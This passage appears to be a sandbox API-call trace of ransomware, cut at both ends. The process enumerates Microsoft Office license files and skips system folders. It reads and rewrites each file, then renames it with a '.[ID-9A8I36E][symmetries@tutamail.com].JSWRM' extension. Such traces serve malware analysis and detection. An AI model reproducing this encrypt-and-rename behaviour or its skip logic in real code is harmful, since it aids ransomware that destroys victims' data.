cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0105.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0105.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0105.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0105.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0105.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0105.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0105.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0105.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.984] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23843) returned 1 [0105.984] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5d20) returned 0x24c1d0 [0105.984] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5d20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5d20, lpOverlapped=0x0) returned 1 [0106.029] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.030] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5d20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5d20, lpOverlapped=0x0) returned 1 [0106.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.030] CloseHandle (hObject=0x45c) returned 1 [0106.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0106.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0106.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0106.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0106.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0106.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0106.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0106.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0106.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0106.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.032] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe74e9435, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe74e9435, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe75ce29c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d87, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", cAlternateFileName="O33C34~1.XRM")) returned 1 [0106.032] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.032] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.032] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.032] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.032] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.032] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.032] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.033] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.033] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.033] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0106.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0106.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0106.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0106.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0106.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0106.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0106.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.034] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11655) returned 1 [0106.034] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0106.034] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0106.036] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.036] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0106.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.036] CloseHandle (hObject=0x45c) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0106.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0106.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0106.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0106.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0106.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.037] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.038] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe74e9435, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe74e9435, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe761a737, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial2-pl.xrm-ms", cAlternateFileName="O3DF87~1.XRM")) returned 1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2=".") returned 1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="..") returned 1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="...") returned 1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="windows") returned -1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="recovery") returned -1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.038] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpString2="msocache") returned 1 [0106.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0106.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0106.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0106.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0106.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.039] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0106.039] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0106.039] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.041] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.041] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.042] CloseHandle (hObject=0x45c) returned 1 [0106.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0106.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0106.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0106.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0106.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0106.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0106.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0106.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0106.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0106.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.043] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7476d1f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7476d1f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe755bb57, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5d23, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", cAlternateFileName="O353E0~1.XRM")) returned 1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2=".") returned 1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="..") returned 1 